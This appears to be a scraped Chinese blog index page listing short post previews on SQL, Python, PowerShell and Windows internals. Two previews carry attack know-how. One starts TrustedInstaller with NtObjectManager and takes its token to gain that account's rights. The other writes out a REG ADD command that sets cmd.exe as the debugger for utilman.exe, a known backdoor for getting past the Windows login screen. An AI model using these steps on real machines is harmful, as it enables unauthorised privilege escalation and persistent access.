自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

  • 博客(8)
  • 资源 (3)
  • 收藏
  • 关注

转载 Insert rows with Unicode characters using BCP

Q:I'm using BCP to bulk upload data from a CSV file to SQL Azure (because BULK INSERT is not supported). This command runs and uploads the rows:bcp [resource].dbo.TableName in C:\data.csv -t "," -r...

2018-10-05 20:15:44 153

原创 class in python

# # -*- coding:UTF-8 -*-class Turtle: def __init__(self,x): self.num = xclass Fish: def __init__(self,y): self.num = yclass Pool(): def __init__(self,x,y): se...

2018-10-03 23:43:21 508

原创 利用token获得TrustedInstaller权限

Save-Module -Name NtObjectManager -Path c:\testInstall-Module -Name NtObjectManagerImport-Module NtObjectManagersc.exe start TrustedInstallerSet-NtTokenPrivilege SeDebugPrivilege$p = Get-NtProces...

2018-10-03 22:19:14 1531

原创 Install-Module offline

Inspect Save-Module -Name NtObjectManager -Path <path> -RequiredVersion 1.0.8Install Install-Module -Name NtObjectManager -RequiredVersion 1.0.8Failing that, just build your own download UR...

2018-10-03 22:17:25 341

原创 user and sid

function get-UserFromSid { param($UserSID = (read-host "Enter the user sid"))$objSID = New-Object System.Security.Principal.SecurityIdentifier($UserSID) $objUser = $objSID.Translate( [System.Securi...

2018-10-03 22:15:51 122

原创 操作系统的设计与实现(目录)

第l章 引言 1.1 什么是操作系统 1.1.1 操作系统作为虚拟机 1.1.2 操作系统作为资源管理器 1.2 操作系统发展历史 1.2.1 第一代计算机(1945~1955):真空管和插板 1.2.2 第二代计算机(1955~1965):晶体管和批处理系统 1.2.3 第三代计算机(1965~1980):集成电路芯片和多道程序 1.2.4 第四代计算机(1980~现在):个人计...

2018-10-03 22:13:12 661

转载 利用辅助工具管理器后门(放大镜后门原理相同,进程为sethc.exe)绕过系统登录界面

调用辅助工具管理器的快捷键: Win+U通过注册表劫持实现后门,修改注册表的命令如下:REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe"...

2018-10-03 22:10:21 853

原创 winapi - Named pipes port number - Stack Overflow

Yes, when communicating with remote machines it uses ports 137 and 139 UDP and potentially 445 TCP. Locally pipes are implemented via MMF (memory mapped files). Essentially some of the facilities used...

2018-10-03 22:07:49 102

extensions for Visual Studio Core

用法:解压附件到C:\Users\xxx\.vscode\extensions目录后重启Visual Studio Core即可加载如下插件:(包含.omnisharp和.debugger) ms-vscode.csharp-1.13.1

2017-11-29

数据库索引设计与优化

《数据库索引设计与优化》提供了一种简单、高效、通用的关系型数据库索引设计方法。作者通过系统的讲解及大量的案例清晰地阐释了关系型数据库的访问路径选择原理,以及表和索引的扫描方式,详尽地讲解了如何快速地估算SQL 运行的CPU 时间及执行时间,帮助读者从原理上理解SQL、表及索引结构、访问方式等对关系型数据库造成的影响,并能够运用量化的方法进行判断和优化,指导关系型数据库的索引设计。, 《数据库索引设计与优化》适用于已经具备了SQL 这一关系型语言相关知识,希望通过理解SQL 性能相关的内容,或者希望通过了解如何有效地设计表和索引而从中获益的人员。另外,《数据库索引设计与优化》也同样适用于希望对新硬件的引入所可能带来的变化做出更好判断的资深人士。

2017-11-02

Win32系统服务开发与实例 CODE

深入学习Win32系统服务开发与实例一书的源代码 转自http://www.pudn.com/downloads456/sourcecode/windows/system/detail1920068.html

2015-04-13

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除